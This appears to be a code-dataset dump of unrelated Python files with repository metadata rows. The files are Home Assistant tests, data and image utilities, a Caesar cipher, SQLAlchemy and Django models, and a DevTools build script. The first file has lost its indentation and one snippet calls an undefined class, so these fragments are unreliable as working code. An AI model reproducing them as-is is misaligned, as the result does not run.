from tests.common import (
MockConfigEntry,
assert_lists_same,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass: HomeAssistant) -> device_registry.DeviceRegistry:
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass: HomeAssistant) -> entity_registry.EntityRegistry:
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def calls(hass: HomeAssistant) -> list[ServiceCall]:
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_conditions(
hass: HomeAssistant,
device_reg: device_registry.DeviceRegistry,
entity_reg: entity_registry.EntityRegistry,
) -> None:
"""Test we get the expected conditions from a select."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": "selected_option",
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": False},
}
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
@pytest.mark.parametrize(
"hidden_by,entity_category",
(
(entity_registry.RegistryEntryHider.INTEGRATION, None),
(entity_registry.RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_conditions_hidden_auxiliary(
hass,
device_reg,
entity_reg,
hidden_by,
entity_category,
):
"""Test we get the expected conditions from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": condition,
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": True},
}
for condition in ["selected_option"]
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
async def test_if_selected_option(
hass: HomeAssistant, calls: list[ServiceCall]
) -> None:
"""Test for selected_option conditions."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "event", "event_type": "test_event1"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option1",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option1 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
{
"trigger": {"platform": "event", "event_type": "test_event2"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option2",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option2 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
]
},
)
# Test with non existing entity
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(
"select.entity", "option1", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["result"] == "option1 - event - test_event1"
hass.states.async_set(
"select.entity", "option2", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["result"] == "option2 - event - test_event2"
async def test_get_condition_capabilities(hass: HomeAssistant) -> None:
"""Test we get the expected capabilities from a select condition."""
config = {
"platform": "device",
"domain": DOMAIN,
"type": "selected_option",
"entity_id": "select.test",
"option": "option1",
}
# Test when entity doesn't exists
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
# Mock an entity
hass.states.async_set("select.test", "option1", {"options": ["option1", "option2"]})
# Test if we get the right capabilities now
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [("option1", "option1"), ("option2", "option2")],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
| [
"[email protected]"
]
| |
3b93255b073c2a9385971e2b9e090d3cb24606ca | 22e4f8c3fd76f099ad05b8ea0e53366878358d44 | /oil_trading/data/prepare_bloomberg_data.py | 333c76de2173719dbaf37701e0db085f5be7f4dc | [
"MIT"
]
| permissive | queiyanglim/trading_algorithm | 272762b97bb3ab15e8174b2cea529f8df525e705 | 959de9ecb503b9de97528e06e57d40382dec9a65 | refs/heads/master | 2021-02-17T23:44:54.909650 | 2021-01-21T15:37:14 | 2021-01-21T15:37:14 | 245,137,152 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | import pandas as pd
def get_bbg_data():
""" Daily prices since 1990"""
path = "https://github.com/queiyanglim/trading_algorithm/raw/master/oil_trading/data/oil_prices.csv"
df_pull = pd.read_csv(path, header=[0], index_col = 0)
df_pull = df_pull[["CO1 Comdty", "CL1 Comdty"]]
df_pull.index.name = "timestamp"
df_pull = df_pull.rename(columns = {"CO1 Comdty": "brent",
"CL1 Comdty": "wti"})
df_pull.index = pd.to_datetime(df_pull.index, format = "%d/%m/%Y")
df = df_pull.copy()
df["spread"] = df.brent - df.wti
# df = df.tail(2000)
# df = np.log(df).diff()
df = df.dropna()
return df | [
"[email protected]"
]
| |
44128fe6dc5acae5eb8b887074251d66121ca915 | fd1f0606ea14cfb69429430d4d8cb5a5a0616ee3 | /python_code/yolo/convert_to_jpg.py | e9816e8e62a6dc828bee1debc266feedf66b6dbb | []
| no_license | mukulbhave/viden | 4fbae0bbfefae2b7e35623de12123c4371037420 | 848b16fa32cd0f180ab80a98254edd2147ea3948 | refs/heads/master | 2023-06-01T16:29:40.131295 | 2021-06-16T10:37:17 | 2021-06-16T10:37:17 | 257,380,167 | 0 | 0 | null | 2021-06-01T16:53:22 | 2020-04-20T19:13:57 | Python | UTF-8 | Python | false | false | 1,146 | py | from PIL import Image
import os, sys,re , fnmatch
import numpy as np
import glob
input_path = "C:\\Users\\sudhir\\Downloads\\EngImg\\"
out="C:\\dataset\\viden_numberplates\\out\\"
def rename():
for index,item in enumerate(dirs):
if item.endswith(".xml"):
x=item.find('-')
print("Renaming "+item+" as "+out +item[x+1:])
#if os.path.isfile(path+item):
os.rename(path+item,out +item[x+1:])
def convert_png_to_jpg():
count = 1
for root, dirnames, filenames in os.walk(input_path):
print("processing: "+root)
for f_name in fnmatch.filter(filenames, '*.png'):
file_path=os.path.join(root, f_name)
print("reading file: "+file_path)
im = Image.open(file_path)
rgb_im = im.convert('RGB')
f_name=f_name.replace(".png",".jpg")
out_path= os.path.join(out, f_name)
print("saving: "+out_path)
rgb_im.save(out_path, 'JPEG', quality=90)
count+=1
print("Processed Files:"+str(count))
convert_png_to_jpg() | [
"[email protected]"
]
| |
d4703ba2bdb76a23ad5f3eef4f0eb86443e92219 | 93dd16432fcb4b42670f208edf81b2eb29f40d41 | /pycaesarcipher.py | 980eed0fa1ec667cce8da2834d93cf03891ce125 | [
"MIT"
]
| permissive | shyams1993/pycaesarcipher | d067f4fda7acdb5f70687d5262a6fbc39d5e3790 | a396f165cc9a103950d060c94e25f7f344e7b257 | refs/heads/master | 2022-06-27T17:28:48.417994 | 2020-05-07T10:05:25 | 2020-05-07T10:05:25 | 261,873,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,180 | py | class pycaesarcipher():
'''
DOCSTRING: This class contains the encipher function & decipher function to one of the most simplest substitution Ciphers - "Caesar's Cipher"
'''
def __init__(self):
return None
def caesar_encipher(self,word,shiftkey):
'''
DOCSTRING: Function to encipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To encrypt, it uses the basic formula : (character + shiftkey)
\nOUTPUT: The Enciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_encipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then encipher to maintain uniformity.
'''
word = word.lower()
ciphertext = []
for w in range(len(word)):
x = (ord(word[w]) + shiftkey)
if x > 122:
y = (x-122)+96
ciphertext.append(chr(y))
elif ord(word[w]) == 32:
y = 32
ciphertext.append(chr(y))
else:
ciphertext.append(chr(x))
word = ''.join([str(s) for s in ciphertext])
return word
def caesar_decipher(self,word,shiftkey):
'''
DOCSTRING: Function to decipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To decipher, it uses the basic formula : (character - shiftkey)
\nOUTPUT: The deciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_decipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then decipher to maintain uniformity.
'''
word = word.lower()
plaintext = []
for w in range(len(word)):
x = (ord(word[w]) - shiftkey)
if x>=70 and x < 97:
y = (x-96)+122
plaintext.append(chr(y))
elif ord(word[w]) == 32:
plaintext.append(chr(32))
else:
plaintext.append(chr(x))
word = ''.join([str(s) for s in plaintext])
return word | [
"[email protected]"
]
| |
717a9d888661f024fbf061eb7916b15f9e48b045 | 77e9396349c6a41dfeec9e270aec37df5871b652 | /code/option2/sut_test.py | c8dfb9fca16c6263aa78dc96f2810518ee0f8cdb | []
| no_license | sryabkov/python_modules_vscode | b62682c465c2dca81749ec48bafb616cf99e59b4 | d1d88a0af55ba540d5e6ff230655a57723b9cb8b | refs/heads/master | 2020-04-24T06:30:56.350656 | 2019-02-21T00:08:26 | 2019-02-21T00:08:26 | 171,767,375 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | """
Test for sut.py
"""
from .sut import some_method_that_returns_string
def test_some_method_that_returns_string():
assert some_method_that_returns_string() == "noop"
if __name__ == "__main__":
test_some_method_that_returns_string()
| [
"[email protected]"
]
| |
a31cb5f185c80ea397b6d84e1e2a1d488a88fd68 | a383c318c17b382bc3acad86b106584123ec5cd5 | /tifa/models/product_attr.py | fb9b11ea5d0303b510746f3e2d342138c1d3f67e | [
"MIT"
]
| permissive | Jormungendr/tifa | 86f20aa8ca28548a5861c6dcd54ab12840aa0b0c | f703fd27f54000e7d51f06d2456d09cc79e0ab72 | refs/heads/master | 2023-07-13T08:21:26.464652 | 2021-08-24T14:19:52 | 2021-08-24T14:19:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,506 | py | import sqlalchemy as sa
from sqlalchemy.orm import relationship
from tifa.globals import Model
from tifa.models.attr import Attribute, AttributeValue
from tifa.models.product import ProductType, Product, ProductVariant
class AttributeProduct(Model):
__tablename__ = "attribute_product"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
attribute = relationship(Attribute)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
product_type = relationship(ProductType)
sort_order = sa.Column(sa.Integer, index=True)
class AssignedProductAttribute(Model):
__tablename__ = "assigned_product_attribute"
__table_args__ = (sa.UniqueConstraint("product_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
product_id = sa.Column(sa.ForeignKey("product.id"), nullable=False)
product = relationship(Product)
assignment_id = sa.Column(
sa.ForeignKey("attribute_product.id"),
nullable=False,
)
assignment = relationship(AttributeProduct)
class AssignedProductAttributeValue(Model):
__tablename__ = "assigned_product_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey("assigned_product_attribute.id"),
nullable=False,
)
assignment = relationship(AssignedProductAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
class AttributeVariant(Model):
__tablename__ = "attribute_variant"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
sort_order = sa.Column(sa.Integer, index=True)
attribute = relationship(Attribute)
product_type = relationship(ProductType)
class AssignedVariantAttribute(Model):
__tablename__ = "assigned_variant_attribute"
__table_args__ = (sa.UniqueConstraint("variant_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
variant_id = sa.Column(
sa.ForeignKey("product_variant.id"),
nullable=False,
)
assignment_id = sa.Column(
sa.ForeignKey("attribute_variant.id"),
nullable=False,
)
assignment = relationship(AttributeVariant)
variant = relationship(ProductVariant)
class AssignedVariantAttributeValue(Model):
__tablename__ = "assigned_variant_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey(
"assigned_variant_attribute.id",
),
nullable=False,
)
assignment = relationship(AssignedVariantAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
| [
"[email protected]"
]
| |
6fa040ec27c8ff99da03fcd41b34c7abf7a93b67 | 391cbb86dc881e9de9bb3b9b0cc15b9199389acb | /python/modularizing/child.py | 94d2c4545ebfa134e03e63fbe19001bacf0d6d6e | []
| no_license | jgreen7773/python_stack | 3291498959de2d289f4b534e5e8643df03375f97 | 2948e467895c18c61f5c91b5c2b80455223a5d63 | refs/heads/master | 2020-07-15T18:12:06.227271 | 2019-09-26T22:37:01 | 2019-09-26T22:37:01 | 205,622,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import parent
print(locals())
# If we import code from the sub-page to the main page, we don't want
# the code from there to be executed on our main page, so we use...
# something like this:
if __name__ == "__main__":
product = Product([args])
print(product)
print(product.add_tax(0.18)) | [
"[email protected]"
]
| |
206aeb7d68e86e28ec22ef45eb51ed4f80dead0f | 3886c78ffed288379a54865ec6e494a514207d0d | /caravantone/view/artist.py | a2cc6e6f37388a036a88955d095390ea26d1f3ea | []
| no_license | Attsun1031/caravantone | 34a2a8b612af7bafc49b063f50953abe469d393b | bc5a9e481649e67f2c631aaf55384a4fce051ba7 | refs/heads/master | 2021-06-11T14:31:43.966237 | 2014-07-20T03:41:08 | 2014-07-20T03:41:08 | 18,760,513 | 0 | 0 | null | 2021-06-01T21:53:28 | 2014-04-14T12:55:19 | JavaScript | UTF-8 | Python | false | false | 1,161 | py | # -*- coding: utf-8 -*-
from flask import request, jsonify
from caravantone import app
from caravantone.view.util import require_login, jsonify_list
from caravantone.model.artist import Artist
from caravantone.es.artist_suggestion import suggest_artist
from caravantone.repository import artist_repository, user_repository
@app.route("/artists", methods=['POST'])
@require_login
def create(user):
"""create new artist data
:param user: current user
:return: Response
"""
artist = artist_repository.find_by_freebase_topic_id(request.form.get('freebase_topic_id'))
if not artist:
artist = Artist(name=request.form.get('name'), freebase_topic_id=request.form.get('freebase_topic_id'))
user.check_artists(artist)
user_repository.save(user)
return jsonify(name=artist.name)
@app.route("/artists/suggest", methods=['GET'])
@require_login
def suggest(user):
"""suggest artist name
:param user: current user
:return: Response
"""
name = request.args.get('name', '')
artists = suggest_artist(name)
return jsonify_list([{'name': artist.name, 'id': artist.artist_id} for artist in artists])
| [
"[email protected]"
]
| |
26cf7f5c49e7790eba3ae1742d71f32697b120fb | fff114e3cb9568fd04e3ee3ccf4b8edac9aece81 | /djangoblog/blogapp/migrations/0004_gory.py | 077977c924d51289d1913c5381b2fee756863028 | []
| no_license | 15SaswatiSingh/Python-in-Django-Framwork-travel-and-tourism- | 1572a589e2ee93ff574ea8d5d68db7b77e34d02e | b4ae21ce2942c4a4db4524f6f164bb5b6f789c86 | refs/heads/master | 2023-03-16T01:57:15.486262 | 2019-03-01T11:23:39 | 2019-03-01T11:23:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | # Generated by Django 2.1.3 on 2019-02-09 03:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0003_auto_20190209_0013'),
]
operations = [
migrations.CreateModel(
name='gory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
]
| [
"[email protected]"
]
| |
8479fc36a34cd92829460ba09dac9233003f21e2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/588.py | bc85913e20b14805e33519ef4c6568305d07637f | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import math
def read(f):
n = int(f.readline().strip())
for i in xrange(n):
p, q = map(int, f.readline().strip().split('/'))
yield p, q
def main(f):
for i, (p, q) in enumerate(read(f)):
if 2 ** int(math.log(q) / math.log(2)) != q:
print("Case #{0}: impossible".format(i+1))
else:
n = int(math.ceil((math.log(q) - math.log(p)) / math.log(2)))
print("Case #{0}: {1}".format(i+1, n))
_input = """
5
1/2
3/4
1/4
2/23
123/31488
""".strip()
_output = """
Case #1: 1
Case #2: 1
Case #3: 2
Case #4: impossible
Case #5: 8
""".strip()
def test_main(compare=False):
import sys
from difflib import unified_diff
from StringIO import StringIO
if compare:
stdout = sys.stdout
sys.stdout = StringIO()
try:
main(StringIO(_input))
result = sys.stdout.getvalue().strip()
finally:
sys.stdout = stdout
print(result)
for line in unified_diff(result.splitlines(), _output.splitlines(),
'Output', 'Expect', lineterm=''):
print(line)
if result == _output:
print("OK")
else:
print("NG")
else:
main(StringIO(_input))
if __name__ == '__main__':
test = False
compare = False
if test:
test_main(compare)
else:
import sys
if len(sys.argv) > 1:
f = open(sys.argv[1])
main(f)
f.close()
else:
main(sys.stdin)
| [
"[email protected]"
]
| |
44f71b6be270f1b19df492c0580443c20b5fea64 | d5c659075525981f5683ebdabcebb6df6429efa4 | /lib/complement.py | c7cb5767abdc9130c5c173830f3a863683e1a778 | [
"MIT"
]
| permissive | baifengbai/QA-CivilAviationKG | eb2a955eb1b4eed00a8bee85fb37f5c7ea2d34d7 | 616cb8bf7b381a53be9726fd4a463c55667677d0 | refs/heads/master | 2022-12-09T15:53:20.268370 | 2020-09-10T15:39:34 | 2020-09-10T15:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | # 问题的填充
import re
import Levenshtein
from lib.regexp import RangeYear, RefsYear
from lib.mapping import map_digits, map_refs
def year_complement(question: str) -> str:
""" 年份自动填充,转换各种表示为数字表示。
例:11年 -> 2011年
两千一十一年 -> 2011年
11-15年 -> 2011年,2012年,2013年,2014年,2015年
13到15年 -> 2013年,2014年,2015年
13年比前年 -> 2013年比2011年
15年比大大前年 -> 2015年比2011年
16年比3年前 -> 2016年比2013年
16年与前三年相比 -> 2016年与2015年,2014年,2013年相比
"""
complemented = question
# 先填充范围
range_years = re.compile(RangeYear).findall(question)
last_year = ''
for (year, gap) in range_years:
year = year.strip('年')
if not gap:
new_year = map_digits(year)
else:
start, end = year.split(gap)
start_year, end_year = int(map_digits(start)), int(map_digits(end))
new_year = ','.join([str(start_year + i) for i in range(end_year - start_year + 1)])
last_year = new_year
complemented = complemented.replace(year, new_year)
# 后填充指代
for i, pattern in enumerate(RefsYear):
ref_years = re.compile(pattern).findall(complemented)
if ref_years:
year = ref_years[0][-1]
new_year = map_refs(year, i, int(last_year))
complemented = complemented.replace(year, new_year)
break
return complemented
def index_complement(question: str, words: list,
len_threshold: int = 4,
ratio_threshold: float = 0.5) -> tuple:
"""对问题中的指标名词进行模糊查询并迭代返回最接近的项.
:param question: 问题
:param words: 查询范围(词集)
:param len_threshold: 最小的有效匹配长度
:param ratio_threshold: 最小匹配率
:return: 首次匹配结果
"""
charset = set("".join(words))
pattern = re.compile(f'([{charset}]+)')
for result in pattern.findall(question):
if len(result) < len_threshold:
continue
scores = []
for word in words:
score = Levenshtein.ratio(word, result)
scores.append(score)
# 得分最高的最近似
max_score = max(scores)
if max_score >= ratio_threshold:
return words[scores.index(max_score)], result
return None, None
| [
"[email protected]"
]
| |
a4de72f9bc8c298600db4419ce1778b70f3c07b5 | 89dedd7f3c7acc81d12e2bcb2e716f9af9e5fa04 | /third_party/WebKit/Source/devtools/scripts/concatenate_application_code.py | e6984e04864e14767f6fd64ff23f1ddfb871c822 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft"
]
| permissive | bino7/chromium | 8d26f84a1b6e38a73d1b97fea6057c634eff68cb | 4666a6bb6fdcb1114afecf77bdaa239d9787b752 | refs/heads/master | 2022-12-22T14:31:53.913081 | 2016-09-06T10:05:11 | 2016-09-06T10:05:11 | 67,410,510 | 1 | 3 | BSD-3-Clause | 2022-12-17T03:08:52 | 2016-09-05T10:11:59 | null | UTF-8 | Python | false | false | 9,961 | py | #!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Release:
- Concatenates autostart modules, application modules' module.json descriptors,
and the application loader into a single script.
- Builds app.html referencing the application script.
Debug:
- Copies the module directories into their destinations.
- Copies app.html as-is.
"""
from cStringIO import StringIO
from os import path
from os.path import join
from modular_build import read_file, write_file, bail_error
import copy
import modular_build
import os
import re
import shutil
import sys
try:
import simplejson as json
except ImportError:
import json
import rjsmin
def resource_source_url(url):
return '\n/*# sourceURL=' + url + ' */'
def minify_js(javascript):
return rjsmin.jsmin(javascript)
def concatenated_module_filename(module_name, output_dir):
return join(output_dir, module_name + '/' + module_name + '_module.js')
def symlink_or_copy_file(src, dest, safe=False):
if safe and path.exists(dest):
os.remove(dest)
if hasattr(os, 'symlink'):
os.symlink(src, dest)
else:
shutil.copy(src, dest)
def symlink_or_copy_dir(src, dest):
if path.exists(dest):
shutil.rmtree(dest)
for src_dir, dirs, files in os.walk(src):
subpath = path.relpath(src_dir, src)
dest_dir = path.normpath(join(dest, subpath))
os.mkdir(dest_dir)
for name in files:
src_name = join(os.getcwd(), src_dir, name)
dest_name = join(dest_dir, name)
symlink_or_copy_file(src_name, dest_name)
class AppBuilder:
def __init__(self, application_name, descriptors, application_dir, output_dir):
self.application_name = application_name
self.descriptors = descriptors
self.application_dir = application_dir
self.output_dir = output_dir
def app_file(self, extension):
return self.application_name + '.' + extension
def core_resource_names(self):
result = []
for module in self.descriptors.sorted_modules():
if self.descriptors.application[module].get('type') != 'autostart':
continue
resources = self.descriptors.modules[module].get('resources')
if not resources:
continue
for resource_name in resources:
result.append(path.join(module, resource_name))
return result
# Outputs:
# <app_name>.html
# <app_name>.js
# <module_name>_module.js
class ReleaseBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
self._build_app_script()
for module in filter(lambda desc: (not desc.get('type') or desc.get('type') == 'remote'), self.descriptors.application.values()):
self._concatenate_dynamic_module(module['name'])
def _build_html(self):
html_name = self.app_file('html')
output = StringIO()
with open(join(self.application_dir, html_name), 'r') as app_input_html:
for line in app_input_html:
if '<script ' in line or '<link ' in line:
continue
if '</head>' in line:
output.write(self._generate_include_tag(self.app_file('js')))
output.write(line)
write_file(join(self.output_dir, html_name), output.getvalue())
output.close()
def _build_app_script(self):
script_name = self.app_file('js')
output = StringIO()
self._concatenate_application_script(output)
write_file(join(self.output_dir, script_name), minify_js(output.getvalue()))
output.close()
def _generate_include_tag(self, resource_path):
if (resource_path.endswith('.js')):
return ' <script type="text/javascript" src="%s"></script>\n' % resource_path
else:
assert resource_path
def _release_module_descriptors(self):
module_descriptors = self.descriptors.modules
result = []
for name in module_descriptors:
module = copy.copy(module_descriptors[name])
module_type = self.descriptors.application[name].get('type')
# Clear scripts, as they are not used at runtime
# (only the fact of their presence is important).
resources = module.get('resources', None)
if module.get('scripts') or resources:
if module_type == 'autostart':
# Autostart modules are already baked in.
del module['scripts']
else:
# Non-autostart modules are vulcanized.
module['scripts'] = [name + '_module.js']
# Resources are already baked into scripts.
if resources is not None:
del module['resources']
result.append(module)
return json.dumps(result)
def _write_module_resources(self, resource_names, output):
for resource_name in resource_names:
resource_name = path.normpath(resource_name).replace('\\', '/')
output.write('Runtime.cachedResources["%s"] = "' % resource_name)
resource_content = read_file(path.join(self.application_dir, resource_name)) + resource_source_url(resource_name)
resource_content = resource_content.replace('\\', '\\\\')
resource_content = resource_content.replace('\n', '\\n')
resource_content = resource_content.replace('"', '\\"')
output.write(resource_content)
output.write('";\n')
def _concatenate_autostart_modules(self, output):
non_autostart = set()
sorted_module_names = self.descriptors.sorted_modules()
for name in sorted_module_names:
desc = self.descriptors.modules[name]
name = desc['name']
type = self.descriptors.application[name].get('type')
if type == 'autostart':
deps = set(desc.get('dependencies', []))
non_autostart_deps = deps & non_autostart
if len(non_autostart_deps):
bail_error('Non-autostart dependencies specified for the autostarted module "%s": %s' % (name, non_autostart_deps))
output.write('\n/* Module %s */\n' % name)
modular_build.concatenate_scripts(desc.get('scripts'), join(self.application_dir, name), self.output_dir, output)
else:
non_autostart.add(name)
def _concatenate_application_script(self, output):
runtime_contents = read_file(join(self.application_dir, 'Runtime.js'))
runtime_contents = re.sub('var allDescriptors = \[\];', 'var allDescriptors = %s;' % self._release_module_descriptors().replace('\\', '\\\\'), runtime_contents, 1)
output.write('/* Runtime.js */\n')
output.write(runtime_contents)
output.write('\n/* Autostart modules */\n')
self._concatenate_autostart_modules(output)
output.write('/* Application descriptor %s */\n' % self.app_file('json'))
output.write('applicationDescriptor = ')
output.write(self.descriptors.application_json())
output.write(';\n/* Core resources */\n')
self._write_module_resources(self.core_resource_names(), output)
output.write('\n/* Application loader */\n')
output.write(read_file(join(self.application_dir, self.app_file('js'))))
def _concatenate_dynamic_module(self, module_name):
module = self.descriptors.modules[module_name]
scripts = module.get('scripts')
resources = self.descriptors.module_resources(module_name)
module_dir = join(self.application_dir, module_name)
output = StringIO()
if scripts:
modular_build.concatenate_scripts(scripts, module_dir, self.output_dir, output)
if resources:
self._write_module_resources(resources, output)
output_file_path = concatenated_module_filename(module_name, self.output_dir)
write_file(output_file_path, minify_js(output.getvalue()))
output.close()
# Outputs:
# <app_name>.html as-is
# <app_name>.js as-is
# <module_name>/<all_files>
class DebugBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
js_name = self.app_file('js')
src_name = join(os.getcwd(), self.application_dir, js_name)
symlink_or_copy_file(src_name, join(self.output_dir, js_name), True)
for module_name in self.descriptors.modules:
module = self.descriptors.modules[module_name]
input_module_dir = join(self.application_dir, module_name)
output_module_dir = join(self.output_dir, module_name)
symlink_or_copy_dir(input_module_dir, output_module_dir)
def _build_html(self):
html_name = self.app_file('html')
symlink_or_copy_file(join(os.getcwd(), self.application_dir, html_name), join(self.output_dir, html_name), True)
def build_application(application_name, loader, application_dir, output_dir, release_mode):
descriptors = loader.load_application(application_name + '.json')
if release_mode:
builder = ReleaseBuilder(application_name, descriptors, application_dir, output_dir)
else:
builder = DebugBuilder(application_name, descriptors, application_dir, output_dir)
builder.build_app()
| [
"[email protected]"
]
| |
3aea4843be237c4dcdce35ea871082ef159c6872 | b9029f7e08bb93c435290e9e01dba3507714bafc | /tasks.py | a64b8ddab455bd356781035556f67836cb43532a | [
"BSD-3-Clause"
]
